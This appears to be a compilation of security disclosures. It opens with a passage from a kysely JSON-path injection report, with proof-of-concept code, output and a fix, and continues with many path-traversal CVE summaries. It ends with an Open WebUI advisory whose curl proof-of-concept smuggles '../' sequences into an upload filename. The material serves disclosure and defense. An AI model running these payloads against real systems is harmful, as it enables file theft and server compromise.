`/Users/admin/joplin_research/kysely-poc/poc.mjs` (no DB, just `.compile()`): ```bash $ node poc.mjs ===== MySQL ===== --- baseline: .key("nick") --- SQL: select `profile`->'$.nick' as `out` from `person` --- INJECTION via .key(ATTACKER) -- "nick.secret_field" --- SQL: select `profile`->'$.nick.secret_field' as `out` from `person` --- INJECTION via .key("*") -- wildcard reaches all keys --- SQL: select `profile`->'$.*' as `out` from `person` --- INJECTION via .at(ATTACKER3) -- bracket escape --- SQL: select `profile`->'$[].secret]' as `out` from `person` ===== PostgreSQL (->$ uses jsonpath, MySQL-like) ===== --- baseline: .key("nick") --- SQL: select "profile"->'$.nick' as "out" from "person" --- INJECTION via .key(ATTACKER) --- SQL: select "profile"->'$.nick.secret_field' as "out" from "person" ===== SQLite ===== --- baseline: .key("nick") --- SQL: select "profile"->>'$.nick' as "value" from "person" --- INJECTION via .key(ATTACKER) --- SQL: select "profile"->>'$.nick.secret_field' as "out" from "person" --- INJECTION via .key("*") --- SQL: select "profile"->>'$.*' as "out" from "person" ``` The compiled SQL clearly shows the dot inside the user-supplied "key" being interpreted by the database as a path separator: `'$.nick'` (one leg) becomes `'$.nick.secret_field'` (two legs). MySQL additionally accepts `*` as a wildcard reaching every member at the current level. ### Step 2 - End-to-end data disclosure on a real database `/Users/admin/joplin_research/kysely-poc/sqlite-runtime.mjs` simulates a typical handler that reads one top-level field of the caller's profile: ```js async function fetchProfileField(userInput) { return db.selectFrom('me') .select(eb => eb.ref('profile', '->>$').key(userInput).as('value')) .where('id', '=', 1) .execute() } ``` The `me.profile` JSON column for user 1 is: ```json { "nick": "alice", "tagline": "hi", "internal": { "ssn": "111-11-1111", "token": "tok_abcdef", "admin": true } } ``` The developer's intent: only top-level keys (`nick`, `tagline`) are ever requested. `internal` is private bookkeeping. ```bash $ node sqlite-runtime.mjs ===== Legitimate request ===== userInput = "nick" compiled SQL: select "profile"->>'$.nick' as "value" from "me" where "id" = ? result: [ { value: 'alice' } ] ===== Injection: dot lets attacker reach nested "internal" object ===== userInput = "internal.ssn" compiled SQL: select "profile"->>'$.internal.ssn' as "value" from "me" where "id" = ? result: [ { value: '111-11-1111' } ] userInput = "internal.token" compiled SQL: select "profile"->>'$.internal.token' as "value" from "me" where "id" = ? result: [ { value: 'tok_abcdef' } ] userInput = "internal.admin" compiled SQL: select "profile"->>'$.internal.admin' as "value" from "me" where "id" = ? result: [ { value: 1 } ] ``` Expected vs. actual: the application invariant was "the user can only read top-level keys of their profile". The output violates that invariant - `internal.ssn`, `internal.token`, and `internal.admin` are returned even though `internal` was never meant to be addressable through this endpoint. The same pattern is exploitable on MySQL (where `*` and `**` wildcards make it strictly worse - a single `*` enumerates every sibling at the current level in one row) and on PostgreSQL when using the `->$`/`->>$` operators (which target MySQL-style JSON-path strings on PG ≥ 17 / via `jsonb_path_query`). ## Impact * **Authorization bypass on JSON sub-fields.** Any kysely-built query whose JSON-path key/index argument is partially or fully attacker-controlled - even in fully type-safe code where the column type is `Record<string, T>` - leaks data the developer believed was scoped behind the explicitly-listed key. SSNs, tokens, admin flags, internal IDs, anything stored as a nested member of the same JSON document is reachable. * **Wildcard reads on MySQL / PostgreSQL `->$`.** `key('*')` compiles to `'$.*'`, returning the array of every value at the current depth in one round-trip. `key('**')` recurses across the whole document. The fix does not strip either token. * **Write access in update statements.** Kysely uses the same path compiler for `update().set(eb => eb.ref(col, '->$').key(input), value)`-style writes (and `jsonb_set` helpers). An attacker who can drive both the path and the value can therefore write into nested fields they should not be able to set - for example flipping an `admin` flag or rewriting a nested role. * **Bypasses the recently-fixed precedent.** The maintainers shipped commit `0a602bf` (PR #1727) specifically to harden this surface. That fix removed the `'` (quote) primitive but left every JSON-path metacharacter alone, so the surface is still open against any caller that *thought* it was now safe. * **Practical bounding.** The attacker needs a code path where a request-derived string lands in `.key(...)` or `.at(...)`. This is a recognised pattern (filter-by-field, dynamic `select` for admin dashboards, Strapi-style JSON-blob columns); it is not a default kysely behaviour but is plausibly common. The vulnerable path is also exercised any time a developer writes `db as Kysely<any>` (covered by the older `GHSA-wmrf-hv6w-mr66` advisory) - but unlike that advisory, the bug here triggers in fully-typed code on `Record<string, T>` columns. ## Suggested fix Treat path legs as a structured emission, not a string-literal escape. The narrowest safe patch is a dedicated `sanitizeJSONPathLeg` that only emits a known-good character set per leg type and rejects everything else, since JSON-path quoting differs by dialect (MySQL allows `"…"`-quoted member names; SQLite is more permissive but still has a grammar; PostgreSQL `jsonpath` is strict). ```ts // src/query-compiler/default-query-compiler.ts const JSON_PATH_MEMBER_OK = /^[A-Za-z_$][A-Za-z0-9_$]*$/ protected override visitJSONPathLeg(node: JSONPathLegNode): void { if (node.type === 'ArrayLocation') { this.append('[') if (typeof node.value === 'number') { this.append(String(node.value | 0)) // int-coerce } else if (node.value === 'last' || /^#-\d+$/.test(node.value)) { this.append(node.value) // documented dialect tokens } else { throw new Error(`invalid JSON array index: ${node.value}`) } this.append(']') return } // Member this.append('.') if (typeof node.value !== 'string' || !JSON_PATH_MEMBER_OK.test(node.value)) { // Per-dialect quoted-member escape would go here; default = reject. throw new Error(`invalid JSON path member: ${JSON.stringify(node.value)}`) } this.append(node.value) } ``` For dialect-specific behaviour (MySQL `"…"`-quoted members, SQLite bracket-quoted), each dialect compiler should override the helper and apply the appropriate quoting + double-the-quote rule, the same way `sanitizeIdentifier` already does. Consider also: parameterise JSON paths whenever the dialect supports it (PostgreSQL `jsonb_path_query($1, $2)`, MySQL `JSON_EXTRACT(?, ?)`), so attacker-controlled keys are bound, not concatenated. Add a regression test to `test/node/src/json-traversal.test.ts` asserting that `eb.ref('c','->$').key('a.b').compile().sql` is **either** rejected, **or** emits MySQL `'$."a.b"'` / SQLite `'$.["a.b"]'` (quoted-member form), and explicitly differs from `key('a').key('b')`. A backstop hardening: tighten the `.at()` runtime to accept only `number | 'last' | '#-${digits}'` (matching the type signature), and tighten `.key()` to only accept strings that match `keyof O` at runtime when `O` is statically known.
Remote unauthenticated attackers can read arbitrary files from MLflow server filesystems in versions 3.9.0 and earlier. By submitting a CreateModelVersion request with the tag 'mlflow.prompt.is_prompt' and an arbitrary local filesystem path as the source, attackers bypass validation logic. The get_model_version_artifact_handler() function later serves files from that path without checking prompt status, enabling full confidentiality breach. Fixed in version 3.10.0 per commit 6e801f4 which blocks file:// URIs and absolute paths for prompt sources. CVSS 7.5 (High) reflects network attack vector with no authentication or user interaction required.
Tookie is a advanced OSINT information gathering tool. Prior to 4.1fix, modules/modules.py's write_txt, write_csv, write_json, and (commented-but-shipping) scan_file helpers open their output as open(f"{user}.<ext>"), where user comes unsanitized from the -u CLI flag or any line of a -U usernames file. A username that contains path-separator sequences (.., /, \, or an absolute path) causes tookie-osint to write the scan output to an arbitrary path the invoking user has write permission for. This vulnerability is fixed in 4.1fix.
Path traversal in Crabbox <0.9.0 allows local attackers to delete or overwrite arbitrary files via malicious .crabbox.yaml configuration. When a user executes Crabbox commands with a crafted workspace configuration containing directory traversal sequences (e.g., '../../../'), the Islo provider performs rm -rf and mkdir -p on attacker-controlled paths outside /workspace. Patch available in v0.9.0 (commit 6b07193). No KEV listing or public POC identified, but exploitation requires only user interaction (opening/running a malicious project), not authentication or special privileges.
OpenClaw before version 2026.4.15 allows arbitrary local file read via the webchat audio embedding helper, which fails to enforce local media root containment checks. Attackers who can influence agent or tool-produced ReplyPayload.mediaUrl parameters can resolve absolute local paths or file:// URLs, read audio-like files, and embed them base64-encoded into webchat responses. The vulnerability is narrow in scope-files must be readable by the gateway process, have audio-like extensions, and fit within the webchat audio size cap-but crosses the security boundary between model/tool output and host filesystem access. No public exploit code or active exploitation has been identified, though the vulnerability is confirmed by vendor advisory.
Remote code execution in GitHub Copilot CLI versions prior to 1.0.43 allows attackers to execute arbitrary commands via malicious bare git repositories embedded in project directories. When the CLI agent performs routine git operations, git's automatic bare repository discovery triggers execution of commands specified in config keys like core.fsmonitor. Attackers can deliver the malicious repository through pull requests, compromised dependencies, or pre-existing cloned repositories. No public exploit identified at time of analysis, though the attack technique leverages well-documented git behavior. The vendor-released patch (version 1.0.43) sets safe.bareRepository=explicit to block automatic bare repository discovery.
Path traversal in Casdoor's Local File System storage provider allows authenticated administrators to write arbitrary files to the filesystem by bypassing path sanitization in the storage sandbox. An attacker with administrative privileges can exploit insufficient input validation to create or overwrite files anywhere on the host system. EPSS score of 0.03% indicates minimal real-world exploitation probability despite the moderate CVSS 5.9 score, suggesting the vulnerability requires both authenticated access and administrative privileges that significantly limit practical attack surface.
{% include %} and {% render %} Liquid tags. The built-in FileSystemLoader and CachingFileSystemLoader failed to reject absolute paths, escaping the configured search path; no public exploit identified at time of analysis but the vendor advisory (GHSA-8p4x-wr7x-3788) publicly documents the bypass mechanism.
Symbolic link path traversal in pgAdmin 4 File Manager allows authenticated users to write arbitrary files on the server filesystem. Attackers with valid credentials can plant symlinks in their storage directory pointing outside it, bypassing access controls to overwrite critical system files or application configurations with pgAdmin process privileges. The vulnerability combines CWE-61 (symlink following) with a time-of-check-time-of-use race condition. Affects all pgAdmin 4 versions before 9.15. No active exploitation confirmed (not in CISA KEV), but exploit is straightforward for authenticated attackers given the detailed fix description published by PostgreSQL project.
Authenticated users in pgAdmin 4 before version 9.15 can read arbitrary server-side files or trigger server-side request forgery (SSRF) attacks via unvalidated LLM API configuration endpoints. The vulnerabilities exist in the chat and model-list endpoints where user-supplied api_key_file and api_url parameters are passed directly to LLM provider clients without sanitization, enabling attackers to exfiltrate sensitive files (database credentials, private keys) readable by the pgAdmin process or coerce internal requests to cloud metadata services and private infrastructure.
Path traversal in Open WebUI's file upload mechanism allows authenticated attackers to write and subsequently delete arbitrary files on the server filesystem. Discovered by Taylor Pennington of KoreLogic, this vulnerability affects the /ollama/models/upload API endpoint where unsanitized filename parameters enable directory traversal using dot-segments. The vulnerability requires low-privilege authentication (PR:L) and has straightforward exploitation (AC:L), confirmed by a published GitHub security advisory (GHSA-j3fw-wc48-29g3) with working proof-of-concept code. Vendor-released patch available in version 0.6.10. No evidence of active exploitation (not in CISA KEV) at time of analysis.
Remote path traversal in GROWI v7.5.0 and earlier allows authenticated administrators to execute arbitrary EJS templates on the server when an email server is configured. The vulnerability enables template injection through directory traversal, potentially leading to remote code execution. Exploitation requires high privileges (administrator role) and a specific deployment configuration with email server functionality enabled. No active exploitation confirmed in CISA KEV, but CVSS 8.6 reflects the severity of arbitrary code execution impact once prerequisites are met.
Path traversal vulnerability in cramfs-tools up to version 2.1 allows local authenticated users to escape directory restrictions via malformed filenames in the Directory Handler component (do_directory function in cramfsck.c). Publicly available exploit code exists. CVSS score of 1.9 reflects low confidentiality, integrity, and availability impact combined with local-only attack vector and required low privilege level; however, the vulnerability enables directory traversal that could facilitate unauthorized file access or modification on systems where cramfs-tools processes untrusted filesystem images.
docuFORM Managed Print Service Client 11.11c is vulnerable to a directory traversal allowing attackers to read arbitrary files via crafted url.
WordPress Plugin amministrazione-aperta 3.7.3 contains a local file read vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting insufficient input validation in the. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Plugin cab-fare-calculator 1.0.3 contains a local file inclusion vulnerability that allows unauthenticated attackers to read arbitrary files by manipulating the controller parameter in. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Remote path traversal in Industrial Application Software IAS Canias ERP 8.03 allows unauthenticated network attackers to read arbitrary files by manipulating the m_strSourceFileName argument in the iasRequestFileEvent function of the RMI Interface. The vulnerability has been publicly disclosed with proof-of-concept code available, and the vendor has not responded to early disclosure notification.
Denial of service in Gibbon versions before v30.0.01 via path traversal during ZIP file extraction allows authenticated users with Teacher or higher privileges to trigger file deletion and application unavailability. The vulnerability exploits improper handling of malicious ZIP archives, where failed extraction attempts result in unintended deletion of PHP application files. This requires elevated privileges within the application and network access to the vulnerable endpoint.
Path traversal in SharpCompress `WriteToDirectory()` allows malicious ZIP and TAR archives to create directories outside the intended extraction root via relative (`../../`) and absolute path (`/tmp/`) overrides in the directory-entry fast-path. TAR archives can be further escalated to arbitrary file writes when callers implement `SymbolicLinkHandler` without validating symlink targets, enabling an attacker to write files anywhere on the filesystem subject to process permissions. CVSS 5.9 reflects moderate severity; real-world impact depends on whether the application extracts untrusted archives and implements symlink handling.
Path traversal in ViewComponent system test entrypoint allows local attackers to read arbitrary files outside the intended temp directory by exploiting a flawed string-prefix containment check. The vulnerability affects ViewComponent 3.0.0 through 4.8.x running in Rails test mode; a request with a crafted file parameter containing a sibling directory name (e.g., `../view_components_evil/secret.html.erb`) bypasses validation because `/app/tmp/view_components_evil/secret.html.erb` passes a `start_with?` check against `/app/tmp/view_components`. This is limited to test environments (Rails.env.test?) but poses risk in shared CI systems, staging, or review apps where test mode is accidentally exposed. Public proof-of-concept code is available.
# **CONFIDENTIAL** # KL-CAN-2024-002 ## Vulnerability Details | # | Field | Value | |---|-------|-------| | 1 | **Discoverer** | Jaggar Henry & Sean Segreti of KoreLogic, Inc. | | 2 | **Date Submitted** | 2024.03.12 | | 3 | **Title** | Open WebUI Arbitrary File Upload + Path Traversal | | 5 | **Affected Vendor** | Open WebUI | | 6 | **Affected Product(s)** | Open WebUI (Formerly Ollama WebUI) | | 7 | **Affected Version(s)** | 0.1.105 | | 8 | **Platform/OS** | Debian GNU/Linux 12 (bookworm) | | 9 | **Vector** | HTTP web interface | | 10 | **CWE** | CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-434: Unrestricted Upload of File with Dangerous Type | --- ## 4. High-level Summary Attacker controlled files can be uploaded to arbitrary locations on the web server's filesystem by abusing a path traversal vulnerability. --- ## 11. Technical Analysis When attaching files to a prompt by clicking the plus sign (+) on the left of the message input box when using the Open WebUI HTTP interface, the file is uploaded to a static upload directory. The name of the file is derived from the original HTTP upload request and is not validated or sanitized. This allows for users to upload files with names containing dot-segments in the file path and traverse out of the intended uploads directory. Effectively, users can upload files anywhere on the filesystem the user running the web server has permission. This can be visualized by examining the python code for the `/rag/api/v1/doc` API route: ```python @app.post("/doc") def store_doc( collection_name: Optional[str] = Form(None), file: UploadFile = File(...), user=Depends(get_current_user), ): # "https://www.gutenberg.org/files/1727/1727-h/1727-h.htm" print(file.content_type) try: filename = file.filename file_path = f"{UPLOAD_DIR}/{filename}" contents = file.file.read() with open(file_path, "wb") as f: f.write(contents) f.close() ``` The `file` variable is a representation of the multipart form data contained within the HTTP POST request. The `filename` variable is derived from the uploaded file name and is not validated before writing the file contents to disk. This can be used to upload malicious models. These models are often distributed as pickled python objects and can be leveraged to execute arbitrary python bytecode once deserialized. Alternatively, an attacker can leverage existing services, such as SSH, to upload an attacker controlled `authorized_keys` file to remotely connect to the machine. --- ## 12. Proof-of-Concept Execute the following cURL command: ```bash TARGET_URI='https://redacted.com'; JWT='redacted'; LOCAL_FILE='/tmp/file_to_upload.txt'\ curl -H "Authorization: Bearer $JWT" -F "file=$LOCAL_FILE;filename=../../../../../../../../../../tmp/pwned.txt" "$TARGET_URI/rag/api/v1/doc" ``` Verify the file `pwned.txt` exists in the `/tmp/` directory on the machine hosting the web server: ```console ollama@webserver:~$ cat /tmp/pwned.txt korelogic ollama@webserver:~$ ```
SolidCAM-GPPL-IDE is an unofficial, independently developed extension, Postprocessor IDE for SolidCAM. From version 1.0.0 to before version 1.0.2, the inc "filename" directive in GPPL postprocessor files is resolved by GpplDocumentLinkHandler into a clickable link (VS Code textDocument/documentLink). The handler accepted arbitrary paths - absolute, relative with parent-directory segments (..\..\..\), UNC (\\server\share\), and arbitrary subfolders - and called File.Exists on each to decide whether to render the link. Two distinct attack surfaces resulted: information disclosure via File.Exists probing and NTLM hash leak via UNC path probing. This issue has been patched in version 1.0.2.
Authenticated attackers can read arbitrary JSON files from SmarterMail servers prior to build 9560 through a path traversal vulnerability in the /api/v1/report/summary/{type} endpoint. The vulnerability chains with weak encryption and hardcoded keys to decrypt stored passwords and two-factor authentication secrets for all system users, enabling complete account compromise. VulnCheck identified this vulnerability; vendor patch available in build 9560 or later. CVSS 8.7 reflects high confidentiality and integrity impact with low attack complexity, though requiring authenticated access (PR:L) moderates immediate risk for internet-exposed instances with strong authentication controls.
Path traversal vulnerability in novaGallery prior to version 2.1.1 allows unauthenticated remote attackers to read arbitrary image files outside the intended gallery root directory via crafted album or image parameters. The vulnerability has low real-world impact (confidentiality only, CVSS 5.3) but affects all unpatched installations since exploitation requires no authentication, user interaction, or special configuration. Vendor-released patch version 2.1.1 is available.
Authenticated administrators in Flarum can read arbitrary files and trigger server-side request forgery via LESS injection in theme color settings. The vulnerability exploits an incomplete patch for CVE-2023-27577 that restricted @import and data-uri() only in the custom_less setting but failed to apply the same restrictions to other LESS config variables such as theme_primary_color and theme_secondary_color. An attacker with admin credentials can inject arbitrary @import directives into compiled forum.css, exposing sensitive files or making outbound HTTP requests to internal networks and cloud metadata endpoints. Vendor-released patches: Flarum 1.8.16 and 2.0.0-rc.1.
URL injection via unsanitized path parameters in i18next-locize-backend prior to 9.0.2 allows remote attackers to manipulate translation resource URLs by injecting path traversal sequences, query strings, or fragments through user-controlled lng, ns, projectId, or version parameters. When these values are exposed via query parameters, cookies, or request headers through i18next-browser-languagedetector, an attacker can redirect requests to unintended translation resources or trigger SSRF/arbitrary-file-read attacks against internal/file-scheme URLs. No public exploit code has been identified, but the vulnerability is straightforward to exploit given network-accessible backend services.
Object.prototype pollution in i18next-http-middleware prior to 3.9.3 allows remote unauthenticated attackers to inject arbitrary properties into all JavaScript objects via crafted HTTP requests, bypassing authorization checks, causing type-confusion denial of service, or enabling remote code execution when chained with vulnerable downstream code. The vulnerability is actively exploitable through two unprotected API endpoints (getResourcesHandler and missingKeyHandler) that accept user-controlled language and namespace parameters without validation. EPSS data not provided, not listed in CISA KEV, but publicly disclosed with detailed GitHub security advisory including technical exploitation details.
Path traversal via symlink exploitation in PraisonAI multi-agent teams system allows remote unauthenticated attackers to write arbitrary files outside intended directories during recipe operations (pull/publish/unpack). The _safe_extractall helper validates archive member names but fails to validate symlink targets (linkname attribute), enabling attackers to craft malicious tar bundles containing symlinks pointing outside extraction directories followed by files traversing through those symlinks. Affects versions prior to 4.6.37. EPSS data unavailable, no CISA KEV listing, and no public POC identified at time of analysis, suggesting limited observed exploitation despite network-accessible attack vector.
Path traversal vulnerability in YARD prior to version 0.9.42 allows remote attackers to access arbitrary files on a server running yard server with unsanitized HTTP requests when using the --docroot flag. The vulnerability affects the documentation serving functionality and has been patched in version 0.9.42. No public exploit code or active exploitation has been identified at the time of analysis.
Remote unauthenticated attackers can read arbitrary local files and trigger deletion of targeted files in SEPPmail Secure Email Gateway versions before 15.0.4 through path traversal in the /api.app/attachment/preview endpoint. The vulnerability allows exploitation without authentication or user interaction (CVSS:4.0 AV:N/AC:L/PR:N/UI:N), enabling attackers to exfiltrate sensitive configuration files, credentials, or email data, and selectively delete files with api.app process privileges. No active exploitation confirmed by CISA KEV at time of analysis, though the unauthenticated remote attack vector and file manipulation capabilities represent elevated risk for exposed email gateway appliances. Swiss NCSC disclosure suggests vendor-coordinated remediation.
Path traversal in Dapr runtime versions 1.3.0-1.15.13, 1.16.0-rc.1-1.16.13, and 1.17.0-rc.1-1.17.4 allows authenticated attackers to bypass service invocation access control policies by exploiting URL encoding mismatches between ACL evaluation and request dispatch layers. Attackers can use encoded path traversal sequences (e.g., admin%2F..%2Fpublic) or reserved URL characters (%23 for fragment, %3F for query) to authorize one path while delivering a different path to the target application. The gRPC API is more dangerous as it passes method strings raw without client-side sanitization. Vendor-released patches are available in versions 1.15.14, 1.16.14, and 1.17.5 (GitHub PR #9589). No public exploit code or CISA KEV listing identified at time of analysis.
Local attackers with standard user accounts can escalate to NT AUTHORITY\SYSTEM privileges in Acer PredatorSense V3 versions 3.00.3136 through 3.00.3196. The gaming utility software exposes a misconfigured Windows Named Pipe allowing arbitrary code execution and file deletion with SYSTEM privileges. CVSS 8.5 (High) reflects severe local impact with low complexity exploitation. No active exploitation confirmed (not in CISA KEV) and no public exploit code identified at time of analysis, though the technical details provided enable development of proof-of-concept code.
Remote path traversal via symlink following in zrok's WebDAV drive backend allows unauthenticated network attackers to read arbitrary files accessible to the zrok process and overwrite critical system files (such as SSH authorized_keys) outside the intended share boundary. Attack complexity is high because exploitation requires a pre-existing symlink inside the shared directory pointing outside DriveRoot-a precondition typically created through local access or misconfiguration, not by the attacker. EPSS data not provided; no CISA KEV listing indicates targeted rather than widespread exploitation. Vendor-released patch available in version 2.0.2 with commit 459bcfc1e121decae1b1d11c37ad94e4ed5bbf2e implementing symlink boundary validation.
Kimai versions 2.32.0 through 2.55.x allow System-Admin users with invoice template upload permission to read arbitrary files from the PHP server via malicious PDF invoice templates. The vulnerability exploits mPDF's SetAssociatedFiles() function combined with unsanitized Twig template rendering to access any file readable by the PHP worker process and embed it within generated PDF invoices. No public exploit code or active exploitation has been identified; patch available in version 2.56.0.
Path traversal in electerm's IPC widget loader allows local code execution with full process privileges when an attacker achieves JavaScript execution in the renderer process. Affects all versions prior to 3.7.16. The vulnerability enables filesystem-wide arbitrary JavaScript file loading and execution through unsanitized path concatenation in runWidget function, bypassing Electron's process isolation. Vendor-released patch available in version 3.7.16. EPSS data not available; no confirmed active exploitation (not in CISA KEV).
Remote code execution in dash-uploader (Python package for Plotly Dash) versions 0.1.0 through 0.7.0a2 allows unauthenticated remote attackers to execute arbitrary code via directory traversal flaws in the HTTP request handler. The vulnerability affects temp_root path handling and POST request processing, enabling attackers to write files outside intended upload directories. Public exploit code exists (GitHub repository CVE-2026-38360), and the CVSS 9.8 critical score reflects the network-accessible, no-authentication attack vector. EPSS data not available, but the combination of RCE impact, public POC, and trivial exploitation complexity (AC:L/PR:N) makes this a high-priority remediation target for any deployment using vulnerable dash-uploader versions.
Path traversal in xiaozhi-mcphub up to version 1.0.3 allows authenticated remote attackers to access arbitrary files via manipulation of the manifest.name argument in src/controllers/dxtController.ts, with CVSS 6.3 indicating moderate impact to confidentiality, integrity, and availability. Publicly available exploit code exists, and the project maintainer has not yet responded to early disclosure notification.
Path traversal vulnerability in gyoridavid short-video-maker up to version 1.3.4 allows remote unauthenticated attackers to read arbitrary files on the server by manipulating the tmpFile parameter in REST API requests. The vulnerability exists in the REST API endpoint src/server/routers/rest.ts and has a publicly available proof-of-concept, though it is not currently confirmed as actively exploited in the wild. With a CVSS score of 5.3 (low/moderate), the vulnerability impacts confidentiality only, enabling information disclosure without requiring authentication or user interaction.
Path traversal in Microsoft APM CLI 0.8.11 and earlier allows malicious plugins to copy arbitrary readable host files into managed project directories during installation. The plugin_parser.py module fails to validate that component paths in plugin.json manifest fields (agents, skills, commands, hooks) remain within the plugin root, enabling attackers to use absolute paths or ../ traversal sequences to exfiltrate local files. Verified proof-of-concept demonstrates a malicious plugin copying external markdown files into .github/prompts/ through the auto-integration pipeline. Exploitation requires user interaction (installing a malicious plugin), but no authentication is required once the user initiates installation. CVSS 7.1 (High) reflects significant confidentiality and integrity impact in a local supply-chain attack scenario. Vendor-released patch available in apm-cli 0.8.12 per GitHub advisory GHSA-xhrw-5qxx-jpwr. No active exploitation (CISA KEV) confirmed, but publicly available exploit code exists with complete proof-of-concept including runnable scripts.
Path traversal in MiniClaw's executeSkillScript function allows authenticated remote attackers to access files outside the intended skills directory via directory traversal sequences in the skillName or scriptFile parameters. The vulnerability affects the isPathInside function in src/kernel.ts, enabling disclosure of sensitive files with CVSS 4.3 (low confidentiality impact). Publicly available exploit code exists and a vendor patch is available via commit e8bd4e17e9428260f2161378356affc5ce90d6ed.
Path traversal in Note Mark's asset upload feature allows authenticated users to inject directory traversal sequences into asset filenames via the X-Name HTTP header, which are stored unsanitized in the database. When an administrator subsequently runs data export CLI commands (typically as root in Docker deployments), the malicious filenames cause arbitrary file writes anywhere on the filesystem through Go's filepath.Join() path normalization. Attackers can achieve remote code execution as root by overwriting system binaries like /bin/bash or injecting cron jobs. Publicly available exploit code exists with video proof-of-concept demonstrating full RCE chain. Vendor-released patch available in version 0.19.4. CVSS 8.6 reflects network attack vector with low complexity but requires authenticated access and administrator interaction to trigger the export process.
Path traversal and URL injection in i18next-http-backend prior to version 3.0.5 allows remote attackers to manipulate request URLs by injecting unsanitized language (lng) and namespace (ns) parameters, potentially leading to server-side request forgery (SSRF), path-based authorization bypass, or arbitrary file reads in SSR deployments. The vulnerability affects all applications using the library with user-controlled language selection via query parameters, cookies, localStorage, or request headers-the default configuration. Vendor-released patch: version 3.0.5.
Unauthenticated information disclosure in FacturaScripts allows remote attackers to trigger phpinfo() output on fresh deployments via /?phpinfo=TRUE, exposing full PHP configuration, environment variables (including database credentials and API keys), filesystem paths, and loaded extensions. The vulnerability affects all versions with the Installer controller enabled and no patch has been released as of April 2026; publicly available proof-of-concept code exists demonstrating exploitation against PHP 8.1.34.
Remote code execution in FacturaScripts ≤2025.71 allows authenticated administrators to upload malicious ZIP files containing path traversal sequences (Zip Slip attack) through the plugin installation mechanism. The vulnerable Plugins::add() function fails to sanitize file paths within ZIP archives, enabling attackers to write arbitrary PHP files outside the plugins directory and execute system commands. A public proof-of-concept exists demonstrating full system compromise. CVSS scores this at 7.2 (High) but requires high-privilege authentication (PR:H), significantly limiting real-world attack surface to scenarios involving compromised admin credentials or malicious insiders.
BentoML's `bentoml build` command dereferences symlinks within the build context and copies their target file contents into the generated Bento artifact, allowing attackers to exfiltrate sensitive files from the build host. An attacker who controls a repository or build context can place symlinks pointing to sensitive local files (credentials, SSH keys, API tokens), and when a developer or CI system runs `bentoml build`, the referenced file contents are packaged into the Bento, which may then be exported, pushed, or containerized, spreading the leaked data. Publicly available exploit code demonstrates successful extraction of files outside the build directory. Affected versions through BentoML 1.4.38; patch released in 1.4.39.
Path traversal in Wish SSH server's SCP middleware allows authenticated attackers to read arbitrary files, write arbitrary files, and create directories outside the configured root via crafted filenames containing ../ sequences. Affects charm.land/wish/v2 versions 2.0.0 through 2.0.1 and all github.com/charmbracelet/wish v1.x versions. Vendor-released patch v2.0.1 available for v2 branch; no fix confirmed for v1 branch. CVSS 9.6 with scope change indicates potential container/host escape scenarios. No evidence of active exploitation or public POC at time of analysis.
Path traversal in Open Notebook v1.8.3's file upload functionality allows unauthenticated local users to read arbitrary files from the Docker container filesystem. The vulnerability stems from insufficient input validation, enabling attackers to bypass directory restrictions and access sensitive container files including configuration data, environment variables, and application secrets. CVSS 8.2 (High severity) reflects substantial confidentiality impact across system and container scopes, though no public exploit code or active exploitation has been identified at time of analysis.
Path traversal in Open Notebook v1.8.3's file upload allows arbitrary file creation or modification within the Docker container filesystem. Attackers with local access can write files outside intended directories, enabling container escape scenarios, configuration tampering, or privilege escalation by overwriting critical system files. No public exploit identified at time of analysis, but the vulnerability affects default configurations where file upload is accessible.
Arbitrary file deletion in WP-Optimize plugin versions ≤4.5.2 allows authenticated attackers with Author-level privileges to delete critical server files including wp-config.php, enabling remote code execution. The vulnerability exploits insufficient path validation in the unscheduled_original_file_deletion function combined with the non-protected 'original-file' meta key that Authors can manipulate via WordPress's Edit Media form or REST API. Wordfence discovered this CWE-22 path traversal flaw affecting the popular WordPress optimization plugin used on hundreds of thousands of sites.
Directory traversal in Spring Cloud Config server module allows remote unauthenticated attackers to read arbitrary files from the file system using specially crafted URLs. Affects Spring Cloud Config versions 3.1.0-3.1.13, 4.1.0-4.1.9, 4.2.0-4.2.6, 4.3.0-4.3.2, and 5.0.0-5.0.2, with patches available across all branches. The vulnerability achieves CVSS 9.1 (Critical) due to remote exploitation without authentication (AV:N/AC:L/PR:N/UI:N) and high confidentiality/integrity impact, though EPSS and KEV data are not available to confirm active exploitation status. VMware/Spring has released fixes for all affected versions.
Path traversal in FileBrowser allows unauthenticated attackers possessing a valid public share hash with delete permissions to delete arbitrary files anywhere within the share owner's storage scope. The vulnerability exists in both stable and development versions due to user-controlled path input being joined with trusted base paths before sanitization in middleware.go:111 and resource.go:274. Proof-of-concept exploit code is publicly available via GitHub advisory GHSA-fwj3-42wh-8673. Vendor-released patch available in commit 112740bdd41de7d5eb01e13ba49d406bfc463f69.
Path traversal in Rancher's UI Extensions mechanism allows authenticated administrators to write arbitrary files to the Rancher server filesystem, potentially overwriting binaries, tampering with cluster state in /var/lib/rancher/, or compromising the host node if hostPath volumes are mounted. This affects Rancher versions 2.10.11 through 2.14.0. While exploitation requires high privileges (administrator access by default) and user interaction to install a malicious extension, the changed scope (S:C) in CVSS 3.1 indicates potential container escape or cross-component impact. Vendor-released patches are available across all affected release branches (2.11.13, 2.12.9, 2.13.5, 2.14.1). No public exploit identified at time of analysis, though the attack technique (CAPEC-126 path traversal) is well-documented.
Arbitrary PDF file read vulnerability in Gotenberg versions up to 8.31.0 allows unauthenticated remote attackers to extract PDF content via path traversal in stampExpression and watermarkExpression parameters on six conversion routes (pdfengines/merge, pdfengines/split, libreoffice/convert, chromium/convert/url, chromium/convert/html, chromium/convert/markdown). The vulnerability exists because these routes accept user-controlled file paths without validation when stamp or watermark source is set to PDF, unlike the dedicated stamp/watermark routes which enforce file upload requirements. An attacker can read any PDF accessible to the Gotenberg process by specifying its filesystem path, gaining access to potentially sensitive documents in containerized deployments or systems with mounted directories.
Angular SSR applications fail to properly validate URL-encoded path traversal sequences in the X-Forwarded-Prefix header, allowing attackers to trigger open redirects or steer server-side HTTP requests to unintended endpoints when the application is configured to trust proxy headers and deployed behind an unsanitized proxy. Exploitation requires the upstream proxy to forward the X-Forwarded-Prefix header without stripping encoded dots (%2e%2e), and the Angular application must perform internal redirects or use relative URLs in server-side HttpClient requests. Vendor-released patches are available for all supported versions.
